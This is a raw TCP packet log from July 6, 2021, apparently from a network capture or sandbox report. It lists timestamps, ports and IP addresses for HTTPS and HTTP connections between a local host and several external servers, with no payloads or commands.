Jul 6, 2021 14:29:45.814559937 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.814578056 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.814611912 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.814663887 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.814668894 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.814699888 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.814733982 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.814749002 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.814804077 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.814855099 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.815253019 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.815278053 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.815385103 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.816340923 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.816366911 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.816426992 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.816466093 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.817415953 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.817439079 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.817534924 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.829890013 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.833075047 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.833101988 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.833170891 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.833209991 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.833498955 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.833524942 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.833553076 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.833574057 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.835280895 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.835372925 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.835376978 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.835397005 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.835422039 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.835427999 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.835445881 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.835510015 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.836080074 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.836149931 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.836179018 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.836200953 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.836220980 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.836231947 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.836287022 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.836930990 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.836962938 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.837002993 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.837044954 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.837732077 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.837798119 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.837810040 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.837868929 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.838541031 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.838570118 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.838610888 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.838634968 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.839354992 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.839425087 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.839438915 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.839483976 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.840174913 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.840198994 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.840235949 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.840255022 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.841010094 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.841036081 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.841063023 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.841073990 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.841108084 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.841855049 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:29:45.841938972 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:29:45.847939968 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.847989082 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848016024 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848047018 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848073959 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848098993 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848124027 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848151922 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848184109 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848212957 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848237991 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848265886 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848292112 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848299026 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848318100 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848319054 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848321915 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848324060 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848325968 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848328114 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848330021 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848331928 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848334074 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848335028 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848336935 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848345995 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848361969 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848371983 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848403931 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848433018 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848507881 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848535061 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848560095 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848586082 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848635912 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848640919 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848644018 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848645926 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848648071 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848649979 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848650932 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848653078 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848747015 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848777056 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.848877907 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.848885059 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851459026 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851495028 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851517916 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851537943 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851552963 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851558924 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851577044 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851624966 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851634979 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851686954 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851691961 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851743937 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851810932 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851875067 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851893902 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851916075 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851937056 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.851946115 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851964951 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.851998091 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852054119 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852076054 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852107048 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852128029 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852154970 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852175951 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852205992 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852224112 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852230072 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852281094 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852293968 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852317095 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852335930 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852340937 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852359056 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852380991 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852389097 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852411032 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852430105 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852432966 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852452993 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852478027 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852540016 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852560997 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852581024 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852582932 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852602959 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852631092 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852668047 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852689028 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852708101 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852710962 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852736950 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852757931 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852776051 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852796078 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852814913 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852818966 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852853060 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852868080 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852901936 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852927923 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852946043 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.852947950 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.852983952 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.853004932 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.853050947 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.853071928 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.853084087 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:29:45.853111982 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:29:45.853138924 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:30:01.157511950 CEST	49782	80	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.157521963 CEST	49781	80	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.336112022 CEST	80	49782	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:01.336347103 CEST	49782	80	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.336796999 CEST	49782	80	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.341130972 CEST	80	49781	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:01.341252089 CEST	49781	80	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.519323111 CEST	80	49782	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:01.519488096 CEST	49782	80	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.519635916 CEST	49782	80	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.563931942 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.698051929 CEST	80	49782	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:01.746521950 CEST	443	49783	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:01.746678114 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.786756992 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.970710993 CEST	443	49783	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:01.970767975 CEST	443	49783	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:01.970809937 CEST	443	49783	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:01.970834017 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.970868111 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:01.970874071 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:02.007256985 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:02.012826920 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:02.191446066 CEST	443	49783	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:02.191570997 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:02.198312044 CEST	443	49783	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:02.198400021 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:02.198942900 CEST	49783	443	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:02.288914919 CEST	49784	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.288966894 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.336925983 CEST	443	49784	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.337153912 CEST	49784	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.337680101 CEST	49784	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.339190006 CEST	443	49785	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.339349985 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.341340065 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.381510973 CEST	443	49783	40.97.116.82	192.168.2.4
Jul 6, 2021 14:30:02.387269020 CEST	443	49784	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.387300014 CEST	443	49784	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.387321949 CEST	443	49784	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.387378931 CEST	49784	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.387427092 CEST	49784	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.389374971 CEST	443	49785	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.389405012 CEST	443	49785	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.389424086 CEST	443	49785	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.389470100 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.389523983 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.398544073 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.398665905 CEST	49784	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.398899078 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.446813107 CEST	443	49785	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.446834087 CEST	443	49785	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.446980953 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.447848082 CEST	443	49784	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.447933912 CEST	49784	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.448287964 CEST	443	49785	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.448357105 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.448633909 CEST	49785	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:02.495194912 CEST	443	49785	52.97.201.50	192.168.2.4
Jul 6, 2021 14:30:02.528048038 CEST	49786	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.528301954 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.573496103 CEST	443	49786	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.573534012 CEST	443	49787	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.573676109 CEST	49786	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.573728085 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.574938059 CEST	49786	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.574970007 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.622009993 CEST	443	49786	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.622046947 CEST	443	49786	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.622071981 CEST	443	49786	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.622096062 CEST	443	49787	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.622124910 CEST	49786	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.622128010 CEST	443	49787	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.622153997 CEST	443	49787	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.622189045 CEST	49786	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.622239113 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.622263908 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.633897066 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.634351969 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.635130882 CEST	49786	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.680321932 CEST	443	49787	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.680954933 CEST	443	49787	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.681065083 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.682212114 CEST	443	49786	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.684485912 CEST	49786	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.707531929 CEST	443	49787	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.707559109 CEST	443	49787	52.97.144.178	192.168.2.4
Jul 6, 2021 14:30:02.707609892 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:02.707648993 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:03.957156897 CEST	49781	80	192.168.2.4	40.97.116.82
Jul 6, 2021 14:30:03.957240105 CEST	49784	443	192.168.2.4	52.97.201.50
Jul 6, 2021 14:30:03.957443953 CEST	49786	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:03.957511902 CEST	49787	443	192.168.2.4	52.97.144.178
Jul 6, 2021 14:30:06.928975105 CEST	443	49747	142.250.180.206	192.168.2.4
Jul 6, 2021 14:30:06.929146051 CEST	49747	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:13.315176964 CEST	49788	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.332420111 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.475821972 CEST	443	49788	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.475929976 CEST	49788	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.489531994 CEST	443	49789	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.489620924 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.489810944 CEST	49788	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.490645885 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.649422884 CEST	443	49789	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.649446011 CEST	443	49789	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.649462938 CEST	443	49789	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.649499893 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.649538040 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.651941061 CEST	443	49788	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.651978016 CEST	443	49788	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.651994944 CEST	443	49788	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.652055025 CEST	49788	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.652096987 CEST	49788	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.695564032 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.695651054 CEST	49788	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.703664064 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.853956938 CEST	443	49789	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.855623960 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.857656002 CEST	443	49788	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.857850075 CEST	49788	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.863450050 CEST	443	49789	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:13.864909887 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.865082979 CEST	49789	443	192.168.2.4	40.97.148.226
Jul 6, 2021 14:30:13.935755968 CEST	49790	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:13.935856104 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:13.982804060 CEST	443	49791	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:13.982839108 CEST	443	49790	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:13.982959986 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:13.983206987 CEST	49790	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:13.983596087 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:13.984164000 CEST	49790	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.021985054 CEST	443	49789	40.97.148.226	192.168.2.4
Jul 6, 2021 14:30:14.031728029 CEST	443	49791	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.031755924 CEST	443	49791	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.031779051 CEST	443	49791	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.031790018 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.031817913 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.031840086 CEST	49791	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.032054901 CEST	443	49790	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.032079935 CEST	443	49790	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.032113075 CEST	443	49790	40.101.137.18	192.168.2.4
Jul 6, 2021 14:30:14.032125950 CEST	49790	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.032160044 CEST	49790	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.040569067 CEST	49790	443	192.168.2.4	40.101.137.18
Jul 6, 2021 14:30:14.040658951 CEST	49791	443	192.168.2.4	40.101.137.18
